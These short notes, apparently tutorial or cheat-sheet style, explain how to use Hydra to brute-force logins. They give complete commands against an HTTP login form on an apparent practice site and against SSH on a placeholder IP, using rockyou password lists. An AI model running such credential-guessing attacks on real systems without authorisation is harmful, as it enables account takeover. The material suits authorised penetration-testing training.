See how to use Hydra in:
🐉 HTTP authentication attack
🐉 SSH authentication attack
verify how it works and what parameters it sends to the application for authentication → inspect source code
see names of parameter
for this example:
hydra
hydra -U http-post-form
hydra crackme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f -V
hydra -U ssh
hydra <target IP> ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V